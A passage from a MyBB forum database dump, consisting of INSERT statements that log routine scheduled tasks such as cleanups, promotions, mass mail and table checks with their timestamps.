(`lid`, `tid`, `dateline`, `data`) VALUES ('14831', '1', '1352116017', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14832', '7', '1352117087', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14833', '5', '1352117092', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14834', '2', '1352117095', 'The daily cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14835', '11', '1352117106', 'The delayed moderation task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14836', '9', '1352117791', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14837', '3', '1352117795', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14838', '1', '1352117797', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14839', '5', '1352117800', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14840', '5', '1352118484', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14841', '9', '1352118497', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14842', '3', '1352120032', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14843', '9', '1352120064', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14844', '5', '1352120254', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14845', '9', '1352121781', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14846', '3', '1352121782', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14847', '1', '1352121783', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14848', '7', '1352121784', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14849', '5', '1352121785', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14850', '5', '1352122032', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14851', '9', '1352122057', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14852', '3', '1352123103', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14853', '9', '1352123447', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14854', '5', '1352123450', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14855', '9', '1352124337', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14856', '3', '1352125207', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14857', '1', '1352125265', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14858', '7', '1352125301', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14859', '5', '1352125322', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14860', '9', '1352125391', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14861', '5', '1352125790', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14862', '9', '1352125880', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14863', '3', '1352125935', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14864', '9', '1352127781', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14865', '5', '1352127958', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14866', '3', '1352128729', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14867', '1', '1352128734', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14868', '7', '1352128738', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14869', '9', '1352128738', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14870', '5', '1352129826', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14871', '9', '1352129988', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14872', '3', '1352129998', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14873', '9', '1352130001', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14874', '5', '1352130833', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14875', '9', '1352131159', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14876', '3', '1352131218', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14877', '1', '1352131492', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14878', '7', '1352131499', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14879', '5', '1352131512', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14880', '9', '1352132475', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14881', '5', '1352132814', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14882', '9', '1352132828', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14883', '3', '1352133424', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14884', '9', '1352133750', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14885', '5', '1352134095', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14886', '9', '1352135439', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14887', '3', '1352135725', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14888', '1', '1352135732', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14889', '7', '1352135739', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14890', '5', '1352136233', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14891', '5', '1352136311', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14892', '9', '1352136348', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14893', '3', '1352137868', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14894', '9', '1352138229', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14895', '5', '1352140038', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14896', '3', '1352140760', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14897', '1', '1352142608', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14898', '7', '1352142648', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14899', '9', '1352142663', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14900', '5', '1352142672', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14901', '3', '1352142688', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14902', '5', '1352143904', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14903', '9', '1352143915', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14904', '3', '1352143919', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14905', '9', '1352144533', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14906', '5', '1352144755', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14907', '9', '1352145766', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14908', '3', '1352145938', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14909', '1', '1352146591', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14910', '7', '1352146599', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14911', '5', '1352146609', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14912', '9', '1352146973', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14913', '5', '1352147335', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14914', '9', '1352149475', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14915', '3', '1352149894', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14916', '5', '1352149901', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14917', '1', '1352149908', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14918', '7', '1352149913', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14919', '9', '1352151088', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14920', '5', '1352151842', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14921', '3', '1352151952', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14922', '9', '1352151970', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14923', '5', '1352152027', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14924', '9', '1352154758', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14925', '3', '1352154776', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14926', '1', '1352154782', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14927', '5', '1352154791', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14928', '7', '1352154789', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14929', '9', '1352155269', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14930', '5', '1352155568', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14931', '9', '1352156135', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14932', '3', '1352156995', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14933', '1', '1352156997', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14934', '7', '1352156999', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14935', '5', '1352157100', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14936', '9', '1352157111', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14937', '5', '1352158386', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14938', '9', '1352158420', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14939', '3', '1352158424', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14940', '9', '1352158883', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14941', '5', '1352159124', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14942', '9', '1352159997', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14943', '3', '1352160005', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14944', '1', '1352160014', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14945', '2', '1352160022', 'The daily cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14946', '7', '1352160089', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14947', '11', '1352160091', 'The delayed moderation task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14948', '5', '1352160742', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14949', '9', '1352161101', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14950', '5', '1352161623', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14951', '9', '1352162131', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14952', '3', '1352162216', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14953', '9', '1352162663', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14954', '5', '1352162804', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14955', '9', '1352163471', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14956', '3', '1352163785', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14957', '1', '1352163865', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14958', '7', '1352163888', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14959', '5', '1352163951', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14960', '9', '1352164356', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14961', '5', '1352165265', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14962', '9', '1352165398', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14963', '3', '1352165402', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14964', '9', '1352166320', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14965', '5', '1352166389', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14966', '9', '1352167065', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14967', '3', '1352167301', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14968', '1', '1352167327', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14969', '7', '1352167380', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14970', '5', '1352167505', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14971', '9', '1352167876', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14972', '5', '1352168827', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14973', '9', '1352169129', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14974', '3', '1352169146', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14975', '9', '1352170107', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14976', '5', '1352170180', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14977', '9', '1352172121', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14978', '3', '1352172123', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14979', '1', '1352172145', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14980', '7', '1352172147', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14981', '5', '1352172224', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14982', '5', '1352172301', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14983', '9', '1352172320', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14984', '3', '1352174089', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14985', '9', '1352174748', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14986', '5', '1352174757', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14987', '3', '1352174763', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14988', '1', '1352175382', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14989', '7', '1352175393', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14990', '9', '1352175432', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14991', '5', '1352176220', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14992', '9', '1352176233', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14993', '3', '1352176234', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14994', '9', '1352177085', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14995', '5', '1352177145', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14996', '9', '1352178087', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14997', '3', '1352178098', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14998', '1', '1352178100', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('14999', '7', '1352178198', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15000', '5', '1352178320', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15001', '9', '1352178710', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15002', '5', '1352179643', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15003', '9', '1352179796', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15004', '3', '1352180004', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15005', '9', '1352180420', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15006', '5', '1352180704', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15007', '9', '1352181456', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15008', '3', '1352181546', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15009', '1', '1352181618', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15010', '7', '1352181619', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15011', '5', '1352182066', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15012', '9', '1352182326', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15013', '5', '1352183375', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15014', '9', '1352183615', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15015', '3', '1352183783', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15016', '9', '1352184812', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15017', '5', '1352185227', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15018', '9', '1352185256', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15019', '3', '1352185260', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15020', '1', '1352185362', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15021', '7', '1352185429', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15022', '5', '1352185522', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15023', '9', '1352185838', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15024', '5', '1352186796', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15025', '9', '1352186813', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15026', '3', '1352188884', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15027', '9', 